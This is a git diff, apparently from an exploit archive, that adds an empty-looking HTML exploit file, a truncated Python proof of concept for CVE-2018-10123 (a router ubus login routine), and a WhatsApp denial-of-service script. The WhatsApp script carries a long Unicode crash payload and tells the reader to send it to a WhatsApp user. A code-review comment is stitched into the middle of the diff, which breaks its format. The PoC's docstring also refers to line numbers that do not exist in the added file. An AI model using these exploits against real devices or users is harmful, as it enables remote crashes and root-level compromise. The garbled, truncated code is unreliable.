diff --git a/exploits/asp/webapps/44631.html b/exploits/asp/webapps/44631.html new file mode 100644 index 000000000..1fee4895a --- /dev/null +++ b/exploits/asp/webapps/44631.html @@ -0,0 +1,144 @@ + + + + + + + + + \ No newline at end of file diff --git a/exploits/hardware/remote/44635.py b/exploits/hardware/remote/44635.py new file mode 100755 index 000000000..e132d9874 --- /dev/null +++ b/exploits/hardware/remote/44635.py @@ -0,0 +1,29 @@ +''' +Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123. + +This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution. +''' + +#!/usr/bin/python3 + +import json +import sys +import socket +import os +import time +from websocket import create_connection + +def ubusAuth(host, username, password): + ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"]) + req = json.dumps({"jsonrpc":"2.0","method":"call", + "params":["00000000000000000000000000000000","session","login", + {"username": username,"password":password}], + "id":666}) + ws.send(req) + response = json.loads(ws.recv()) + ws.close() + try: + key = response.get('result')[1].get('ubus_rpc_session') + except IndexError: + return(None) + return(key) \ No newline at end of file diff --git a/exploits/ios/dos/44629.py b/exploits/ios/dos/44629.py new file mode 100755 index 000000000..4a7b48d0e --- /dev/null +++ b/exploits/ios/dos/44629.py 
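Review bot: In `ubusAuth` the `except IndexError` around `response.get('result')[1].get('ubus_rpc_session')` is too narrow: a rejected login or a JSON-RPC error reply may carry no `result` member at all, in which case `.get('result')` yields `None` and the subscript raises `TypeError` instead of the `None` return the function intends; catch `(IndexError, TypeError, AttributeError)` or test `response.get('result')` before indexing. `ws.close()` is only reached on the happy path — if `ws.recv()` or `json.loads` raises, the socket leaks — so put send/recv in a `try`/`finally` that closes the connection. The `#!/usr/bin/python3` line sits after the module docstring, where the kernel never sees it; a shebang must be the first line of the file. The docstring tells the reader to edit lines 58-61 and 63, but the file added by this hunk is 29 lines long, so that guidance cannot refer to this file and should be corrected or dropped. `sys`, `socket`, `os` and `time` are imported but never used.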
@@ -0,0 +1,81 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Author: Juan Sacco at Exploit Pack +- http://www.exploitpack.com +# This vulnerability has been discovered and exploited using Exploit +Pack - Framework +# +# Tested on: iPhone 5/6s/X iOS 10 and 11.3 ( Latest release of iOS at +the date of writing this code ) +# +# Description: +# WhatsApp 2.18.31 and prior are affected. The application fails to +properly filter user-supplied input and its prone to a remote memory +corruption. +# +# Impact: +# Resource exhaustion attacks exploit a design flaw. An attacker could +exploit this vulnerability to remotely corrupt the memory of the +application forcing an uhandled exception +# in the context of the application that could potentially result in a +denial-of-service condition and/or remote memory corruption. +# +# Debug: +# B04500954836","name":"WhatsApp"} +# Date/Time: 2018-04-06 18:15:30.608135 +0200 +# OS Version: iPhone OS 11.2.6 (Build 15D100) +# Architecture: arm64 +# Report Version: 19 +# Command: WhatsApp +# Path: +/private/var/containers/Bundle/Application/2F86B692-D9A3-4BAC-B45E-6DCF62F47C2C/WhatsApp.app/WhatsApp +# Version: 2.18.31 (2.18.31.32) +# Beta Identifier: 4CA20191-C4A3-4920-ADEB-9ABAD10FCDF7 +# Parent: launchd [1] +# PID: 28010 +# Event: cpu usage +# CPU: 144s cpu time over 145 seconds (99% cpu average), +exceeding limit of 80% cpu over 180 seconds +# Action taken: Process killed +# Duration: 144.81s +# Steps: 48 +# Hardware model: iPhone7,1 +# Exception Type: EXC_CRASH (SIGKILL) +# +# How to use this exploit: +# Send the payload as a message to a whatsapp user, trough a phone or +whatsapp-web. 
+# +# Timeline: +# Date and time of release: 6 April 2018 +# Triaged by Facebook: 25 April 2018 +# Reported to Apple ( it's a bug on their side ): 01 May 2018 +# Vendor homepage: http://www.whatsapp.com / http://www.facebook.com + +import sys +reload(sys) + +def whatsapp(filename): + sys.setdefaultencoding("utf-8") + payload = u'⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋
⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙
⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣